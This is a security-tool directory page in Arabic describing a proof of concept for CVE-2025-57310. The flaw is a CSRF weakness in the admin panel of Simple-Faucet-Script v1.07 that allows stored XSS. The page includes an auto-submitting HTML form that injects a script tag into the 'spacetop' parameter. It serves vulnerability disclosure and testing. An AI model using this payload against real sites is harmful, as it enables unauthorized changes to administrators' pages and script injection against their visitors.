Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-57310 — إثبات مفهوم لاستغلال CVE-2025-57310: ثغرة CSRF في Simple-Faucet-Script v1.07 تُمكّن من تخزين XSS عبر طلبات POST مصمَّمة إلى لوحة المشرف. | Kitploit
أدوات/GitHubGitHub/hossainshadat/cve-2025-57310
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubhossainshadat/cve-2025-57310

CVE-2025-57310

إثبات مفهوم لاستغلال CVE-2025-57310: ثغرة CSRF في Simple-Faucet-Script v1.07 تُمكّن من تخزين XSS عبر طلبات POST مصمَّمة إلى لوحة المشرف.

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-57310

ثغرة تزوير الطلبات عبر المواقع (CSRF) في Salmen2/Simple-Faucet-Script الإصدار 1.07 عبر طلب POST مصمم إلى admin.php?p=ads&c=1 تتيح للمهاجمين تنفيذ تعليمات برمجية عشوائية.

CWE

CWE-352: تزوير الطلبات عبر المواقع (CSRF)

CVSS v3.1 النتيجة الأساسية: 8.8 (عالية)

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

ملخص

المنتج عرضة لثغرة تزوير الطلبات عبر المواقع (CSRF) في لوحة الإدارة. عندما يزور مدير مصادق صفحة ضارة تحتوي على الإثبات المفاهيمي (PoC)، يؤدي هجوم CSRF إلى تعديل غير مصرح به لمحتوى الصفحة الرئيسية.

خطوات إعادة الإنتاج

  1. سجل الدخول كمدير على https://example.com/admin.php
  2. افتح الإثبات المفاهيمي التالي، لاحظ ظهور نافذة تنبيه على الصفحة الرئيسية (XSS مخزنة).
root@kitploit:~
<!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="https://example.com/admin.php?p=ads&c=1" method="post">
        <input type="hidden" name="spacetop" value="<script>alert();</script>" />
          <input type="submit" value="Submit request" />
      </form>
      <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
      </script>
  </body>
  </html>

التأثير

يمكن للمهاجم حقن HTML/JavaScript عشوائي في الصفحة الرئيسية عبر المعامل spacetop، مما يؤدي إلى حدوث ثغرة XSS مخزنة (Stored Cross-Site Scripting).

تنزيل الأداة